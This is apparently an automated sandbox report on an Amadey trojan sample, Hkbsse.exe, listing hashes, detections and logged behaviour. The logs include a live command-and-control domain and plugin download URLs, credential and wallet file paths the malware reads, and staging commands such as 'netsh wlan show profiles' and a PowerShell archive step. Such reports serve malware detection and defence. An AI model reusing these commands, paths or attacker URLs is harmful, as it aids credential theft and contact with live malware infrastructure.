Summary | ZeroBOX

Hkbsse.exe

Tags: Amadey, Generic Malware, Malicious Library, Antivirus, UPX, Malicious Packer, PE File, PE64, DLL, OS Processor Check, JPEG Format, PE32

Category: FILE
Machine: s1_win7_x6401
Started: Sept. 26, 2024, 10:19 a.m.
Completed: Sept. 26, 2024, 10:21 a.m.
Size 434.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e4f3ed3daf21363918afbc91db6f775b
SHA256 4c6f323142d184d3021fce521628676badac99d1664d8ec208e6d2fb298e65b4
CRC32 42292343
ssdeep 12288:iAHIqeXuOre8e8lHcafb1eVL5u2OUtkr:nIqeXu2ewWqb1w7tkr
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name            Response        Post-Analysis Lookup
amoamosss.com   31.41.154.129

IP Address      Status   Action
164.124.101.2   Active   Moloch
31.41.154.129   Active   Moloch

Time & API         Arguments                  Status  Return  Repeated
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameA   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
Time & API          Arguments        Status  Return  Repeated
IsDebuggerPresent   (no arguments)   0 0
IsDebuggerPresent   (no arguments)   0 0
IsDebuggerPresent   (no arguments)   0 0
Time & API      buffer             crypto_handle       flags  crypto_export_handle  blob_type  Status  Return  Repeated
CryptExportKey  <INVALID POINTER>  0x0000000000311cb0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4942a0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4942a0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4942a0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4942a0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4942a0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493ba0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493ba0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493ba0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493ba0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494540  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494540  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494540  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494a10  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494af0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494af0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000000038e110  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000000038e110  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000000038e110  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00000000002f6430  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00000000002f6430  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493f90  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b493f90  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b494230  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c2950  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c2950  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c29c0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c29c0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c3360  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4c3360  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00000000002f63c0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x00000000002f63c0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4943f0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4943f0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4943f0  0      0x0000000000000000    6          1       1       0
CryptExportKey  <INVALID POINTER>  0x000000001b4943f0  0      0x0000000000000000    6          1       1       0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\Psi\profiles\default\accounts.xml
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API             Arguments        Status  Return  Repeated
GlobalMemoryStatusEx   (no arguments)   1       1       0
suspicious_features: POST method with no referer header, POST method with no useragent header; suspicious_request: POST http://amoamosss.com/Dem7kTu/index.php
suspicious_features: POST method with no referer header, POST method with no useragent header; suspicious_request: POST http://amoamosss.com/Dem7kTu/index.php?scr=1
suspicious_features: GET method with no useragent header; suspicious_request: GET http://amoamosss.com/Dem7kTu/Plugins/cred64.dll
suspicious_features: GET method with no useragent header; suspicious_request: GET http://amoamosss.com/Dem7kTu/Plugins/clip64.dll
request POST http://amoamosss.com/Dem7kTu/index.php
request POST http://amoamosss.com/Dem7kTu/index.php?scr=1
request GET http://amoamosss.com/Dem7kTu/Plugins/cred64.dll
request GET http://amoamosss.com/Dem7kTu/Plugins/clip64.dll
request POST http://amoamosss.com/Dem7kTu/index.php
request POST http://amoamosss.com/Dem7kTu/index.php?scr=1
Time & API               Arguments                                                                                                                                                                                                   Status / Return / Repeated
NtProtectVirtualMemory   process_identifier: 2544  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x73bc2000  process_handle: 0xffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2544  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x00ba0000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 1452  region_size: 65536  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x00000000046e0000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2664  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x73572000  process_handle: 0xffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2892  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000000007304c000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 2490368  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x0000000002960000  allocation_type: 8192 (MEM_RESERVE)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 8192  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x0000000002b40000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef34c1000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373e000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373e000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373f000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3740000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3740000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3740000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3740000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3740000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3741000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3741000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3741000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef3741000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtProtectVirtualMemory   process_identifier: 2052  length: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fef373e000  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00052000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 589824  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fffff10000  allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fffff10000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fffff10000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 65536  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fffff00000  allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 0  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007fffff00000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff0010a000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00042000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 8192  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x0000000002b42000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 12288  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x0000000002b44000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff0011a000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00053000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00054000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00142000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff0011d000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff0010b000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00102000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00055000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00190000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00043000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00056000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
NtAllocateVirtualMemory  process_identifier: 2052  region_size: 4096  protection: 64 (PAGE_EXECUTE_READWRITE)  base_address: 0x000007ff00143000  allocation_type: 4096 (MEM_COMMIT)  process_handle: 0xffffffffffffffff  stack_dep_bypass: 0  stack_pivoted: 0  heap_dep_bypass: 1  Status: 1  Return: 0  Repeated: 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\cred64.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
file C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
file C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll
Time & API        Arguments                                                                                                                                                                      Status / Return / Repeated
ShellExecuteExW   show_type: 0  filepath_r: C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe  parameters: (empty)  filepath: C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe   Status: 1  Return: 1  Repeated: 0
ShellExecuteExW   show_type: 0  filepath_r: rundll32.exe  parameters: C:\Users\test22\AppData\Roaming\8cadd6e0860cae\cred64.dll, Main  filepath: rundll32.exe                                   Status: 1  Return: 1  Repeated: 0
ShellExecuteExW   show_type: 0  filepath_r: rundll32.exe  parameters: C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll, Main  filepath: rundll32.exe                                   Status: 1  Return: 1  Repeated: 0
Time & API         Arguments                                                                                                                                                          Status / Return / Repeated
InternetReadFile   buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE (PE64/AMD64 image; sections .text .rdata .data .pdata _RDATA .rsrc .reloc) [raw binary omitted]  request_handle: 0x00cc000c   Status: 1  Return: 1  Repeated: 0
InternetReadFile   buffer: MZ ... "This program cannot be run in DOS mode." ... Rich ... PE (PE32/i386 image; sections .text .rdata .data .rsrc .reloc) [raw binary omitted]  request_handle: 0x00cc000c   Status: 1  Return: 1  Repeated: 0
Time & API              Arguments                                                 Status  Return  Repeated
LookupPrivilegeValueW   system_name: (empty)  privilege_name: SeDebugPrivilege   1       1       0
cmdline netsh wlan show profiles
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file C:\Windows\Tasks\Hkbsse.job
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Windows\.purple\accounts.xml
file C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files\_Sandboxie\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file C:\util\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file C:\Users\test22\Downloads\.purple\accounts.xml
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file C:\Program Files\_Wireshark\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\063c9e1716\.purple\accounts.xml
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.Downloader.gh
ALYac Gen:Variant.Zusy.552096
Cylance Unsafe
VIPRE Gen:Variant.Zusy.552096
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005790d31 )
BitDefender Gen:Variant.Zusy.552096
K7GW Trojan-Downloader ( 005790d31 )
Arcabit Trojan.Zusy.D86CA0
Baidu Win32.Trojan.Delf.in
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Avast Win32:BotX-gen [Trj]
ClamAV Win.Malware.Generic-10033391-0
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
Alibaba TrojanSpy:Win32/Amadey.ec5c772a
MicroWorld-eScan Gen:Variant.Zusy.552096
Rising Stealer.Agent!8.C2 (TFE:5:94ZIjYSVylS)
Emsisoft Gen:Variant.Zusy.552096 (B)
F-Secure Heuristic.HEUR/AGEN.1375090
DrWeb Trojan.MulDrop28.19665
McAfeeD Real Protect-LS!E4F3ED3DAF21
Trapmine malicious.moderate.ml.score
CTX exe.unknown.zusy
Sophos Generic ML PUA (PUA)
SentinelOne Static AI - Suspicious PE
FireEye Generic.mg.e4f3ed3daf213639
Jiangmin TrojanSpy.Stealer.akal
Google Detected
Avira HEUR/AGEN.1375090
Kingsoft malware.kb.a.979
Microsoft Trojan:Win32/Amadey!MTB
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Gen:Variant.Zusy.552096
